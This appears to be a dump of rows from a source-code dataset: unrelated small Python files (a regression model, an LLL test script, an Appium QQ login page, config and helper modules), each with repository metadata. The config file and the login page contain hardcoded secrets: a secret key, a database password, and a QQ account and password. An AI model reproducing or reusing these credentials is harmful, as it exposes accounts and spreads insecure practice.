"Apache-2.0"
] | null | null | null | chaptertwo/namecases.py | cmotek/python_crashcourse | 29cbdd6699cd17192bb599d235852d547630d110 | [
"Apache-2.0"
] | null | null | null | name = "fRoDo"
lowercase_name = name.lower()
uppercase_name = name.upper()
titlecase_name = name.title()
print(lowercase_name, uppercase_name, titlecase_name) | 32 | 54 | 0.78125 | 21 | 160 | 5.666667 | 0.428571 | 0.201681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 160 | 5 | 54 | 32 | 0.826389 | 0 | 0 | 0 | 0 | 0 | 0.031056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
24bd1dafd359bf1c94c84098d0bd837f3503e96e | 184 | py | Python | test/data/users_guide/test_escape/main.py | frederic-loui/tenjin | 13fccc464f882133d11219f7660d8eac3c524ae6 | [
"MIT"
] | null | null | null | test/data/users_guide/test_escape/main.py | frederic-loui/tenjin | 13fccc464f882133d11219f7660d8eac3c524ae6 | [
"MIT"
] | null | null | null | test/data/users_guide/test_escape/main.py | frederic-loui/tenjin | 13fccc464f882133d11219f7660d8eac3c524ae6 | [
"MIT"
] | null | null | null | import tenjin
from tenjin.helpers import *
import cgi
engine = tenjin.Engine(path=['views'], escapefunc="cgi.escape", tostrfunc="str")
print(engine.get_template('page.pyhtml').script)
| 30.666667 | 80 | 0.766304 | 25 | 184 | 5.6 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076087 | 184 | 5 | 81 | 36.8 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.157609 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
24db0bb65821f2657ff2f44911782f9dde13a2fb | 5,898 | py | Python | Regression/RegressionAdaBoost.py | lujunzju/MachineLearningForAirTicketPredicting | e64b6c75a00a8b2a74d67d132f6e5b852db9c974 | [
"MIT"
] | 47 | 2017-06-28T07:45:04.000Z | 2022-01-31T09:15:13.000Z | Regression/RegressionAdaBoost.py | lujunzju/MachineLearningForAirTicketPredicting | e64b6c75a00a8b2a74d67d132f6e5b852db9c974 | [
"MIT"
] | 2 | 2017-08-28T07:59:17.000Z | 2018-03-02T06:37:08.000Z | Regression/RegressionAdaBoost.py | lujunzju/MachineLearningForAirTicketPredicting | e64b6c75a00a8b2a74d67d132f6e5b852db9c974 | [
"MIT"
] | 20 | 2017-09-01T13:46:25.000Z | 2021-05-05T12:47:16.000Z | # system library
import numpy as np
# user-library
import RegressionBase
# third-party library
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import AdaBoostRegressor
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import mean_squared_error
from sklearn.learning_curve import validation_curve
import matplotlib.pyplot as plt
class RegressionAdaBoost(RegressionBase.RegressionBase):
def __init__(self, isTrain):
super(RegressionAdaBoost, self).__init__(isTrain)
# data preprocessing
#self.dataPreprocessing()
# Create AdaBoost regression object
decisionReg = DecisionTreeRegressor(max_depth=10)
rng = np.random.RandomState(1)
self.adaReg = AdaBoostRegressor(decisionReg,
n_estimators=400,
random_state=rng)
def dataPreprocessing(self):
# due to the observation, standization does not help the optimization.
# So do not use it!
#self.Standardization()
pass
def parameterChoosing(self):
dts = []
dts.append(DecisionTreeRegressor(max_depth=5, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=7, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=9, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=11, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=12, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=14, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=15, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=17, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=19, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=21, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=22, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=24, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=26, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=27, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=31, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=33, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=35, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=37, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=39, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=41, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=43, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=45, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=47, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=49, max_features='auto'))
dts.append(DecisionTreeRegressor(max_depth=50, max_features='auto'))
tuned_parameters = [{'base_estimator': dts,
'n_estimators': range(5,700),
'learning_rate': [1, 2, 3]
}
]
reg = GridSearchCV(AdaBoostRegressor(), tuned_parameters, cv=5, scoring='mean_squared_error')
reg.fit(self.X_train, self.y_train.ravel())
print "Best parameters set found on development set:\n"
print reg.best_params_
print "Grid scores on development set:\n"
for params, mean_score, scores in reg.grid_scores_:
print "%0.3f (+/-%0.03f) for %r\n" % (mean_score, scores.std() * 2, params)
print "MSE for test data set:\n"
y_true, y_pred = self.y_test, reg.predict(self.X_test)
print mean_squared_error(y_true, y_pred)
def drawValidationCurve(self):
"""
To draw the validation curve
:return:NA
"""
X, y = self.X_train, self.y_train.ravel()
indices = np.arange(y.shape[0])
#np.random.shuffle(indices)
X, y = X[indices], y[indices]
train_sizes = range(5,700)
train_scores, valid_scores = validation_curve(self.adaReg, X, y, "n_estimators",
train_sizes, cv=5, scoring='mean_squared_error')
train_scores = -1.0/5 *train_scores
valid_scores = -1.0/5 *valid_scores
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
valid_scores_mean = np.mean(valid_scores, axis=1)
valid_scores_std = np.std(valid_scores, axis=1)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, valid_scores_mean - valid_scores_std,
valid_scores_mean + valid_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training MSE")
plt.plot(train_sizes, valid_scores_mean, '*-', color="g",
label="Cross-validation MSE")
plt.legend(loc="best")
plt.xlabel('Estimators')
plt.ylabel('MSE')
plt.title('Validation Curve with AdaBoost-DecisionTree Regression\n on the parameter of Estimators when the Decsion Tree has max depth=10')
plt.grid(True)
plt.show()
def training(self):
# train the linear regression model
self.adaReg.fit(self.X_train, self.y_train.reshape((self.y_train.shape[0], )))
def predict(self):
# predict the test data
self.y_pred = self.adaReg.predict(self.X_test)
# print MSE
mse = mean_squared_error(self.y_pred, self.y_test)
print "MSE: {}".format(mse)
| 43.367647 | 147 | 0.659546 | 716 | 5,898 | 5.223464 | 0.247207 | 0.057754 | 0.201604 | 0.220588 | 0.47861 | 0.411765 | 0.360428 | 0.340107 | 0 | 0 | 0 | 0.019859 | 0.231604 | 5,898 | 135 | 148 | 43.688889 | 0.805384 | 0.055103 | 0 | 0 | 0 | 0.010638 | 0.092383 | 0.003827 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010638 | 0.085106 | null | null | 0.074468 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
24fd1f05e1ce552de13339e2d4ba380d9739f219 | 58 | py | Python | src/msanalyzer/__init__.py | marcusbfs/msanalyzer | 5a633716807a8ffe44c7651cf70de8fea10a1532 | [
"MIT"
] | null | null | null | src/msanalyzer/__init__.py | marcusbfs/msanalyzer | 5a633716807a8ffe44c7651cf70de8fea10a1532 | [
"MIT"
] | 1 | 2020-06-29T19:43:58.000Z | 2020-06-29T19:43:58.000Z | src/msanalyzer/__init__.py | marcusbfs/msanalyzer | 5a633716807a8ffe44c7651cf70de8fea10a1532 | [
"MIT"
] | null | null | null | from __future__ import annotations
__version__ = "3.8.0"
| 14.5 | 34 | 0.775862 | 8 | 58 | 4.625 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06 | 0.137931 | 58 | 3 | 35 | 19.333333 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
70019ac63a1505d65bbec211b82b3b5df817ad89 | 1,217 | py | Python | test.py | luch61008/olll | b09e7754034dbd94a61d35454190ba6d6bbcd190 | [
"MIT"
] | null | null | null | test.py | luch61008/olll | b09e7754034dbd94a61d35454190ba6d6bbcd190 | [
"MIT"
] | null | null | null | test.py | luch61008/olll | b09e7754034dbd94a61d35454190ba6d6bbcd190 | [
"MIT"
] | null | null | null | import olll
import numpy as np
test1 = [[1,0,0,1,1,0,1],[0,1,0,5,0,0,0],[0,0,1,0,5,0,5]]
test2 = [[1,0,0,2,-1,1],[0,1,0,3,-4,-2],[0,0,1,5,-10,-8]]
test3 = [[1,0,0,1,1,0,1], [0,1,0,4,-1,0,-1], [0,0,1,1,1,0,1]]
test4 = [[1,0,0,2,5,3],[0,1,0,1,1,1,],[0,0,1,4,-2,0]]
test5 = [[1,0,0,0,0,0,2,1,1,2],[0,1,0,0,0,0,1,1,-1,-1],[0,0,1,0,0,0,-1,0,-2,-3],[0,0,0,1,0,0,1,-1,1,-1],[0,0,0,0,1,0,-1,2,-4,-3],[0,0,0,0,0,1,1,0,0,1]]
test6 = [[1, 0, 0, 5, 0, 0, 0],[0, 1, 0, 0, 5, 0, 5],[0, 0, 1, 1, 1, 0, 1]]
test7 = [[1, 0, 0, 20, 0, 0, 0],[0, 1, 0, 0, 20, 0, 20],[0, 0, 1, 4, 4, 0, 4]]
test8 = [[1, 0, 0, 10, 0, 0, 0],[0, 1, 0, 0, 10, 0, 10],[0, 0, 1, 2, 2, 0, 2]]
n = input("Please enter n: \n")
n = int(n)
k = input("Please enter k: \n")
k = int(k)
p = input("Please enter p: \n")
p = int(p)
id = np.identity(k)
A = [[]] * k
print("Please enter the generating set:\n")
for i in range(k):
print("\nEnter the generator a[",i,"]: ")
a = list(map(int,input().strip().split()))[:n]
#print(i, a)
a = [x * (2**p) for x in a]
y = list(id[i])
print(y[i],type(y[i]))
A[i] = y+a
print(A[i], type(A[i]))
print(A, type(A))
print(test7, type(test7))
rb = olll.reduction(test7,0.75)
print("Basis: ", rb)
| 31.205128 | 151 | 0.474938 | 322 | 1,217 | 1.795031 | 0.164596 | 0.17301 | 0.108997 | 0.076125 | 0.271626 | 0.186851 | 0.129758 | 0.062284 | 0.034602 | 0.034602 | 0 | 0.22145 | 0.172555 | 1,217 | 38 | 152 | 32.026316 | 0.352532 | 0.009039 | 0 | 0 | 0 | 0 | 0.101245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.064516 | 0 | 0.064516 | 0.225806 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
70240807ca72daa40bb0285e918ba7616c10ff87 | 1,024 | py | Python | auto/AppTester/page/page.py | Strugglingrookie/oldboy2 | 8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47 | [
"Apache-2.0"
] | 1 | 2021-06-15T07:01:23.000Z | 2021-06-15T07:01:23.000Z | auto/AppTester/page/page.py | Strugglingrookie/oldboy2 | 8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47 | [
"Apache-2.0"
] | 3 | 2020-02-13T14:35:36.000Z | 2021-06-10T21:27:14.000Z | auto/AppTester/page/page.py | Strugglingrookie/oldboy2 | 8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47 | [
"Apache-2.0"
] | 1 | 2020-04-09T02:13:12.000Z | 2020-04-09T02:13:12.000Z | from lib.appController import driver_queue
from lib.pyapp import Pyapp
import threading
# driver 多线程运行是进行线程之间的数据隔离
local = threading.local()
# 配置在实例化时,去mq中获取创建好的driver,如果调试page则需要传递driver
class BasePage(object):
def __init__(self, driver=None):
if driver is None:
local.driver = driver_queue.get()
local.pyapp = Pyapp(local.driver)
else:
local.driver = driver
local.pyapp = Pyapp(driver)
def quit(self):
local.app.quit()
def reset_package(self):
local.pyapp.reset()
class QQ_Login_Page(BasePage):
def login(self):
local.pyapp.click('android=>new UiSelector().text("登 录")')
def username(self):
local.pyapp.type('content=>请输入QQ号码或手机或邮箱', 3408467505)
def passwd(self):
local.pyapp.type('content=>密码 安全', 'besttest123')
def login_check(self, name):
return local.pyapp.wait_and_save_exception('android=>new UiSelector().text("登 录")', name)
class Page(QQ_Login_Page):
pass
| 23.813953 | 97 | 0.658203 | 125 | 1,024 | 5.272 | 0.44 | 0.106222 | 0.084977 | 0.072838 | 0.15478 | 0.078907 | 0 | 0 | 0 | 0 | 0 | 0.016373 | 0.224609 | 1,024 | 42 | 98 | 24.380952 | 0.813602 | 0.067383 | 0 | 0 | 0 | 0 | 0.127101 | 0.023109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.259259 | false | 0.074074 | 0.111111 | 0.037037 | 0.518519 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
7027aab2db4848e19c8bba08f545d442f47da027 | 126 | py | Python | swift/common/ring/__init__.py | vvechkanov/SwiftUml | 98fa5adfe5664dbb4f328ba2a1789a63c7550eed | [
"Apache-2.0"
] | 1 | 2021-01-06T12:40:43.000Z | 2021-01-06T12:40:43.000Z | swift/common/ring/__init__.py | Triv90/SwiftUml | 98fa5adfe5664dbb4f328ba2a1789a63c7550eed | [
"Apache-2.0"
] | null | null | null | swift/common/ring/__init__.py | Triv90/SwiftUml | 98fa5adfe5664dbb4f328ba2a1789a63c7550eed | [
"Apache-2.0"
] | null | null | null | from ring import RingData, Ring
from builder import RingBuilder
__all__ = [
'RingData',
'Ring',
'RingBuilder',
]
| 14 | 31 | 0.666667 | 13 | 126 | 6.153846 | 0.538462 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230159 | 126 | 8 | 32 | 15.75 | 0.824742 | 0 | 0 | 0 | 0 | 0 | 0.18254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
70384a2cc1df0e02dedd4b43b4487effab21a9f3 | 502 | py | Python | src/test_generator/ast_assertion.py | AAU-PSix/canary | 93b07d23cd9380adc03a6aa1291a13eaa3b3008c | [
"MIT"
] | null | null | null | src/test_generator/ast_assertion.py | AAU-PSix/canary | 93b07d23cd9380adc03a6aa1291a13eaa3b3008c | [
"MIT"
] | null | null | null | src/test_generator/ast_assertion.py | AAU-PSix/canary | 93b07d23cd9380adc03a6aa1291a13eaa3b3008c | [
"MIT"
] | null | null | null | from typing import Any
from .ast_expression import Expression
from .ast_statement import Statement
class Assertion(Statement):
def __init__(self, actual: Expression, expected: Expression) -> None:
self._actual = actual
self._expected = expected
@property
def actual(self) -> Expression:
return self._actual
@property
def expected(self) -> Expression:
return self._expected
def accept(self, visitor: Any):
visitor.visit_assertion(self) | 26.421053 | 73 | 0.693227 | 56 | 502 | 6.017857 | 0.357143 | 0.089021 | 0.118694 | 0.142433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227092 | 502 | 19 | 74 | 26.421053 | 0.868557 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.266667 | false | 0 | 0.2 | 0.133333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
70a519e84ace4ea743e801d80cfc9c16a3a76337 | 529 | py | Python | mnu_gsheets/utils/user_agent.py | seanbreckenridge/mnu_gsheets | 4b531497003a790a2fd0bce2e892bfcb58da9e76 | [
"Apache-2.0"
] | 1 | 2021-04-24T22:45:17.000Z | 2021-04-24T22:45:17.000Z | mnu_gsheets/utils/user_agent.py | seanbreckenridge/mnu_gsheets | 4b531497003a790a2fd0bce2e892bfcb58da9e76 | [
"Apache-2.0"
] | null | null | null | mnu_gsheets/utils/user_agent.py | seanbreckenridge/mnu_gsheets | 4b531497003a790a2fd0bce2e892bfcb58da9e76 | [
"Apache-2.0"
] | null | null | null | from random import choice
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108",
"Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90",
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko)",
]
def random_user_agent() -> str:
return choice(user_agents)
| 40.692308 | 108 | 0.693762 | 93 | 529 | 3.88172 | 0.462366 | 0.088643 | 0.099723 | 0.132964 | 0.590028 | 0.465374 | 0.465374 | 0.465374 | 0.465374 | 0.34349 | 0 | 0.180804 | 0.153119 | 529 | 12 | 109 | 44.083333 | 0.625 | 0 | 0 | 0 | 0 | 0.444444 | 0.731569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0.111111 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
560f1da729f378a242bc88563d83e2f7fd5ca92f | 120 | py | Python | pycodes/__init__.py | blazaid/pycodes | e263fad64ad7d056feb7ac2056e1d27aec52a6d9 | [
"Apache-2.0"
] | null | null | null | pycodes/__init__.py | blazaid/pycodes | e263fad64ad7d056feb7ac2056e1d27aec52a6d9 | [
"Apache-2.0"
] | null | null | null | pycodes/__init__.py | blazaid/pycodes | e263fad64ad7d056feb7ac2056e1d27aec52a6d9 | [
"Apache-2.0"
] | null | null | null | __version__ = '0.0.1'
__url__ = 'http://github.com/blazaid/pycodes/'
__author__ = 'blazaid'
def check_ean13():
pass | 20 | 46 | 0.691667 | 16 | 120 | 4.375 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048077 | 0.133333 | 120 | 6 | 47 | 20 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0.380165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
5612e9e9a7262c254784a284937a576dbf7bc368 | 115 | py | Python | swig/build.py | ShawnZhong/python-c-extension | 99f14239f2c77fa463ef112124964ecbd31e2bbc | [
"W3C"
] | null | null | null | swig/build.py | ShawnZhong/python-c-extension | 99f14239f2c77fa463ef112124964ecbd31e2bbc | [
"W3C"
] | null | null | null | swig/build.py | ShawnZhong/python-c-extension | 99f14239f2c77fa463ef112124964ecbd31e2bbc | [
"W3C"
] | null | null | null | from setuptools import setup, Extension
setup(ext_modules=[
Extension('_module', sources=["module_wrap.c"])
]) | 23 | 51 | 0.73913 | 14 | 115 | 5.857143 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 5 | 52 | 23 | 0.803922 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
562aa92474de124a685af503bc30494105a08729 | 301 | py | Python | envs/hns/mujoco-worldgen/mujoco_worldgen/util/path.py | jiayu-ch15/curriculum | 7305833b8f875c91f7598029f63fd3e543a0fd82 | [
"MIT"
] | 424 | 2019-09-17T15:50:41.000Z | 2022-03-26T07:10:21.000Z | envs/hns/mujoco-worldgen/mujoco_worldgen/util/path.py | jiayu-ch15/curriculum | 7305833b8f875c91f7598029f63fd3e543a0fd82 | [
"MIT"
] | 7 | 2019-09-18T08:54:58.000Z | 2020-08-28T15:12:45.000Z | envs/hns/mujoco-worldgen/mujoco_worldgen/util/path.py | jiayu-ch15/curriculum | 7305833b8f875c91f7598029f63fd3e543a0fd82 | [
"MIT"
] | 81 | 2019-09-18T00:14:25.000Z | 2022-03-30T18:25:08.000Z | from os.path import abspath, dirname, join
WORLDGEN_ROOT_PATH = abspath(join(dirname(__file__), '..', '..'))
def worldgen_path(*args):
"""
Returns an absolute path from a path relative to the mujoco_worldgen repository
root directory.
"""
return join(WORLDGEN_ROOT_PATH, *args)
| 25.083333 | 83 | 0.700997 | 39 | 301 | 5.153846 | 0.589744 | 0.119403 | 0.159204 | 0.199005 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.182724 | 301 | 11 | 84 | 27.363636 | 0.817073 | 0.315615 | 0 | 0 | 0 | 0 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
562ef59e8f3331ef65babdfc148475b7ce285811 | 545 | py | Python | backend/config.py | Xingwd/seer | 41c8a4571af3422eea1bc1befd5b60a9e4bd889b | [
"MIT"
] | null | null | null | backend/config.py | Xingwd/seer | 41c8a4571af3422eea1bc1befd5b60a9e4bd889b | [
"MIT"
] | null | null | null | backend/config.py | Xingwd/seer | 41c8a4571af3422eea1bc1befd5b60a9e4bd889b | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
# https://dormousehole.readthedocs.io/en/latest/config.html#config
class Config(object):
SECRET_KEY = 'e9d37baf44de4b11a76159c50820468f'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_stock' # 股票数据库,默认
SQLALCHEMY_BINDS = {
'fund': 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_fund' # 基金数据库
}
CHROME_DRIVER = '/Users/xingweidong/envs/selenium/webdriver/chrome/88.0.4324.96/chromedriver'
| 45.416667 | 108 | 0.73578 | 60 | 545 | 6.533333 | 0.75 | 0.061224 | 0.117347 | 0.173469 | 0.255102 | 0.255102 | 0.255102 | 0 | 0 | 0 | 0 | 0.07839 | 0.133945 | 545 | 11 | 109 | 49.545455 | 0.752119 | 0.183486 | 0 | 0 | 0 | 0.125 | 0.542141 | 0.53303 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
563500829c4d069d25d29e122217af76c93ab51d | 174 | py | Python | api/Note_test.py | gracejiang/note-sharing | 3785ab4f3f6f805e8cd0f6556c2b0faf6ed6d8da | [
"MIT"
] | null | null | null | api/Note_test.py | gracejiang/note-sharing | 3785ab4f3f6f805e8cd0f6556c2b0faf6ed6d8da | [
"MIT"
] | null | null | null | api/Note_test.py | gracejiang/note-sharing | 3785ab4f3f6f805e8cd0f6556c2b0faf6ed6d8da | [
"MIT"
] | 1 | 2021-03-02T12:34:11.000Z | 2021-03-02T12:34:11.000Z | import json
from Note import Note
n = Note("Friction", "introduction to friction", "UC Berkeley", 0, True, False, False, "https://google.com", 'lec.pdf')
print(n.toJSON())
| 24.857143 | 119 | 0.689655 | 26 | 174 | 4.615385 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006623 | 0.132184 | 174 | 6 | 120 | 29 | 0.788079 | 0 | 0 | 0 | 0 | 0 | 0.390805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
56521af6f787122a9235b0899f31bb8d50512114 | 376 | py | Python | catalearn/__init__.py | Catalearn/Catalearn | 01587241bf9b6809975a560e654d3ef3a47965e8 | [
"MIT"
] | null | null | null | catalearn/__init__.py | Catalearn/Catalearn | 01587241bf9b6809975a560e654d3ef3a47965e8 | [
"MIT"
] | null | null | null | catalearn/__init__.py | Catalearn/Catalearn | 01587241bf9b6809975a560e654d3ef3a47965e8 | [
"MIT"
] | null | null | null | import sys
import warnings
from .upgrade import isLatestVersion
sys.setrecursionlimit(50000)
warnings.filterwarnings('ignore')
# if not isLatestVersion():
# print('This version of catalearn is no longer compatible with the backend')
# print('Please use \'pip3 install -U catalearn\' to upgrade to the latest version')
# sys.exit()
from .catalearn import *
| 19.789474 | 88 | 0.736702 | 47 | 376 | 5.893617 | 0.680851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019293 | 0.172872 | 376 | 18 | 89 | 20.888889 | 0.871383 | 0.550532 | 0 | 0 | 0 | 0 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
567dc74cca5ce962c42e1ff80a6d92dca8715b6b | 209 | py | Python | py3rijndael/__init__.py | squaresmile/py3rijndael | 569fe2a4b2ab5ccb4768e2fabcd0fa398e3c97fc | [
"MIT"
